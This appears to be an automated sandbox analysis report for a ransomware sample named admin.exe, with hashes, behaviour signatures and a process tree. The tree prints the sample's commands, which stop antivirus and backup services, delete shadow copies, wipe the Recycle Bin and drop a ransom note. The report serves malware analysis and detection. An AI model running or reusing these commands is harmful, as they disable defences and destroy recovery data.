Analysis
-
max time kernel
91s -
max time network
129s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
17-04-2021 12:03
General
-
Target
admin.exe
-
Size
63KB
-
MD5
ae776cbf46e5d71831c0d0d6c37b3bbf
-
SHA1
3ee387589ef93afe4ed2609c0c242e29f5d164b4
-
SHA256
83e2ba9faf075547be65d2b6dbd13e190a0b1c1cf626788cb756ab7a3c770dcb
-
SHA512
486d0ce8e49b1ab0fd6a56d6982abad8661c35fb27343a623c7a58bf1f5a74ccff3a954d02e9713d501bb72e9dac829f459cad2f1b3cc225ce052568ee3785ee
Score
9/10
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
-
Drops startup file 1 IoCs
-
Enumerates connected drives 3 TTPs 18 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 3 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SendNotifyMessage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\admin.exe"C:\Users\Admin\AppData\Local\Temp\admin.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt2⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\admin.exe2⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txtMD5
7504b567104d256fbc540e0e5c67b227
SHA18097328e9f9400b7e484e6902d18b5de24098079
SHA25668123104072c44fcdd581c6515f4e4cb1dc887b0def30d547db12bbb45733e06
SHA512f82d02a526daa484e241996b0b6b56c888e6d1f06faea69911281ad2f621e1ac2c47bacacd3d54eb1fe596d023a145d618af2a24dea25591190bc38c58c574bb
-
memory/684-130-0x0000000000000000-mapping.dmp
-
memory/1160-132-0x0000000000000000-mapping.dmp
-
memory/1276-124-0x0000000000000000-mapping.dmp
-
memory/1364-131-0x0000000000000000-mapping.dmp
-
memory/1660-134-0x0000000000000000-mapping.dmp
-
memory/1864-135-0x0000000000000000-mapping.dmp
-
memory/2016-143-0x0000000004910000-0x0000000004911000-memory.dmpFilesize
4KB
-
memory/2016-181-0x0000000005860000-0x0000000005861000-memory.dmpFilesize
4KB
-
memory/2016-114-0x0000000000130000-0x0000000000131000-memory.dmpFilesize
4KB
-
memory/2208-128-0x0000000000000000-mapping.dmp
-
memory/2280-175-0x0000000000000000-mapping.dmp
-
memory/2324-126-0x0000000000000000-mapping.dmp
-
memory/2456-116-0x0000000000000000-mapping.dmp
-
memory/2484-137-0x0000000000000000-mapping.dmp
-
memory/2488-117-0x0000000000000000-mapping.dmp
-
memory/2512-118-0x0000000000000000-mapping.dmp
-
memory/2716-127-0x0000000000000000-mapping.dmp
-
memory/2756-140-0x0000000000000000-mapping.dmp
-
memory/2764-119-0x0000000000000000-mapping.dmp
-
memory/2768-123-0x0000000000000000-mapping.dmp
-
memory/3044-120-0x0000000000000000-mapping.dmp
-
memory/3148-125-0x0000000000000000-mapping.dmp
-
memory/3152-133-0x0000000000000000-mapping.dmp
-
memory/3180-138-0x0000000000000000-mapping.dmp
-
memory/3332-141-0x0000000000000000-mapping.dmp
-
memory/3472-122-0x0000000000000000-mapping.dmp
-
memory/3492-129-0x0000000000000000-mapping.dmp
-
memory/3552-121-0x0000000000000000-mapping.dmp
-
memory/3852-136-0x0000000000000000-mapping.dmp
-
memory/3856-142-0x0000000000000000-mapping.dmp
-
memory/4048-139-0x0000000000000000-mapping.dmp
-
memory/4160-144-0x0000000000000000-mapping.dmp
-
memory/4204-145-0x0000000000000000-mapping.dmp
-
memory/4216-146-0x0000000000000000-mapping.dmp
-
memory/4224-176-0x0000000000000000-mapping.dmp
-
memory/4228-147-0x0000000000000000-mapping.dmp
-
memory/4272-148-0x0000000000000000-mapping.dmp
-
memory/4324-177-0x0000000000000000-mapping.dmp
-
memory/4336-149-0x0000000000000000-mapping.dmp
-
memory/4384-150-0x0000000000000000-mapping.dmp
-
memory/4408-151-0x0000000000000000-mapping.dmp
-
memory/4436-152-0x0000000000000000-mapping.dmp
-
memory/4456-153-0x0000000000000000-mapping.dmp
-
memory/4484-154-0x0000000000000000-mapping.dmp
-
memory/4516-155-0x0000000000000000-mapping.dmp
-
memory/4528-156-0x0000000000000000-mapping.dmp
-
memory/4544-178-0x0000000000000000-mapping.dmp
-
memory/4568-157-0x0000000000000000-mapping.dmp
-
memory/4608-158-0x0000000000000000-mapping.dmp
-
memory/4628-179-0x0000000000000000-mapping.dmp
-
memory/4672-159-0x0000000000000000-mapping.dmp
-
memory/4680-160-0x0000000000000000-mapping.dmp
-
memory/4696-180-0x0000000000000000-mapping.dmp
-
memory/4704-161-0x0000000000000000-mapping.dmp
-
memory/4736-162-0x0000000000000000-mapping.dmp
-
memory/4748-163-0x0000000000000000-mapping.dmp
-
memory/4784-164-0x0000000000000000-mapping.dmp
-
memory/4804-165-0x0000000000000000-mapping.dmp
-
memory/4816-166-0x0000000000000000-mapping.dmp
-
memory/4856-167-0x0000000000000000-mapping.dmp
-
memory/4888-168-0x0000000000000000-mapping.dmp
-
memory/4920-169-0x0000000000000000-mapping.dmp
-
memory/4964-170-0x0000000000000000-mapping.dmp
-
memory/5004-171-0x0000000000000000-mapping.dmp
-
memory/5020-172-0x0000000000000000-mapping.dmp
-
memory/5032-173-0x0000000000000000-mapping.dmp
-
memory/5088-174-0x0000000000000000-mapping.dmp